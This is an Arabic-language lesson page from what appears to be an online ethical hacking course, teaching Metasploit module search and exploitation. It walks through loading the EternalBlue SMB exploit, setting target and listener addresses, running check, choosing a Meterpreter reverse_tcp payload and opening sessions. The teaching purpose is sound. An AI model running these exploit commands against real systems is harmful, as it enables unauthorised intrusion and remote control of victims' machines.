البحث عن الثغرات واستغلالها
العثور والتشغيل
البحث عن الثغرات واستغلالها درس مجاني في Ethical Hacking Academy على CoddyKit. هذا هو الدرس 2 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Ethical Hacking Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Ethical Hacking Academy 4 دروس في المجموع.
من الاستطلاع إلى الاستغلال
بعد الفحص، تعرفون خدمات الهدف وإصداراتها. والخطوة التالية هي العثور على وحدة استغلال تطابق ثغرة معروفة في تلك الإصدارات.
يُعد الأمر search في Metasploit بوابتكم إلى آلاف الوحدات. ويوفر البحث الدقيق الوقت ويجنبكم تشغيل الشيفرة الخاطئة.
البحث الأساسي
يستعلم الأمر search عن فهرس الوحدات باستخدام كلمة مفتاحية. ويمكنكم البحث باسم البرنامج أو CVE أو الخدمة.
search eternalblue
search type:exploit platform:windows smbعوامل تصفية البحث
نقّحوا النتائج باستخدام عوامل التصفية:
- type: exploit, auxiliary, post.
- platform: windows, linux, unix.
- cve: معرّف CVE محدد.
- rank: excellent, great, good (الموثوقية).
يؤدي الجمع بين عوامل التصفية إلى تقليص آلاف الوحدات بسرعة إلى عدد قليل منها.
search cve:2017-0144 type:exploitقراءة مخرجات البحث
تسرد نتائج البحث كل وحدة مع تصنيف وتاريخ الكشف ومؤشر check. ويعكس التصنيف موثوقية الاستغلال وسلامته.
- excellent: من غير المرجح أن يتسبب في تعطل الهدف.
- great/good: موثوق في الظروف الشائعة.
- low/manual: محفوف بالمخاطر أو يحتاج إلى إعداد دقيق.
فضّلوا الوحدات ذات التصنيف الأعلى لتجنب تعطيل أنظمة الإنتاج.
تحميل وحدة
استخدم رقم فهرس الوحدة أو مسارها الكامل مع use. يتغير سطر الأوامر ليعرض الوحدة المحمّلة، ويحتوي مخزن البيانات الآن على خيارات تلك الوحدة.
use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >فحص الوحدة
اقرأ معلومات الوحدة قبل تشغيلها. يعرض info الوصف والمراجع (CVE والتنبيهات الأمنية) والخيارات المطلوبة والأهداف المدعومة.
يُعد فهم وظيفة الوحدة جزءًا من الاستخدام المهني والمسؤول؛ لا تشغّل مطلقًا استغلالًا لا تفهمه.
info
show options
show targetsضبط الخيارات
اضبط الخيارات المطلوبة باستخدام set. من الخيارات الشائعة للاستغلال عن بُعد عنوان الهدف وإعدادات الحمولة الخاصة بك.
set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2الأمر check
تدعم العديد من عمليات الاستغلال الأمر check، الذي يختبر بأمان ما إذا كان الهدف يبدو عرضةً للخطر من دون استغلاله فعليًا.
يُعد تشغيل check أولًا ممارسة جيدة؛ فهو يقلل خطر تعطّل النظام ويؤكد أنك على وشك استثمار جهدك في فرصة حقيقية.
check
# [+] 10.10.10.40:445 - The target is vulnerable.اختيار الحمولة
تحتاج عملية الاستغلال إلى حمولة. يختار Metasploit حمولة افتراضية، لكن يمكنك عرض الحمولات واختيار ما يلائم الهدف واحتياجات الوصول لديك.
show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcpالتشغيل والجلسات
شغّل العملية باستخدام exploit (أو run). عند النجاح تحصل على جلسة، وهي اتصال تفاعلي بالهدف.
أدِر جلسات متعددة باستخدام sessions -l لعرضها وsessions -i N للتفاعل معها. ضع جلسة في الخلفية باستخدام background لمتابعة العمل في وحدة التحكم.
exploit
sessions -l
sessions -i 1الخيارات العامة مقابل خيارات الوحدة
تُستخدم بعض الإعدادات، مثل LHOST، عبر وحدات عديدة. اضبطها عالميًا باستخدام setg حتى لا تضطر إلى إعادة كتابتها عند التبديل بين الوحدات.
set: يُطبّق على الوحدة الحالية فقط.setg: يُطبّق عالميًا عبر الوحدات.unsetg: يمسح قيمة عامة.
يوفر ذلك الوقت أثناء المهام الطويلة التي تستخدم وحدات عديدة.
setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40تحقق سريع
اختر الخطوة المسؤولة التي تسبق تشغيل عملية الاستغلال.
مراجعة
تعلمت كيفية العثور على عمليات الاستغلال وتشغيلها:
- استخدم search مع عوامل التصفية (النوع والمنصة وcve والتصنيف) للعثور على الوحدات.
- فضّل الوحدات ذات rank الأعلى لتحقيق موثوقية وأمان أكبر.
- استخدم use للتحميل، وinfo/show options للفحص، وset للضبط.
- شغّل check أولًا، ثم exploit للحصول على جلسة.
- أدِر الجلسات باستخدام sessions -l/-i.
التالي: الحمولات وقشرة Meterpreter لما بعد الاستغلال.
الأسئلة الشائعة
هل درس «البحث عن الثغرات واستغلالها» مجاني؟
نعم — نص درس «البحث عن الثغرات واستغلالها» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Ethical Hacking Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Ethical Hacking Academy 4 دروس في المجموع.
ماذا ستتعلم في «البحث عن الثغرات واستغلالها»؟
العثور والتشغيل تتمرن على Ethical Hacking Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.
هل أحتاج إلى خبرة سابقة لأبدأ Ethical Hacking Academy؟
لا تُشترط خبرة سابقة. Ethical Hacking Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 2 من أصل 4.
كم من الوقت يستغرق درس «البحث عن الثغرات واستغلالها»؟
معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.
هل يمكنني كتابة وتشغيل أكواد في درس Ethical Hacking Academy هذا؟
نعم. كل درس في Ethical Hacking Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.
جميع الدروس في هذه الدورة
- بنية Metasploit
- البحث عن الثغرات واستغلالها
- الحمولات وMeterpreter
- وحدات ما بعد الاستغلال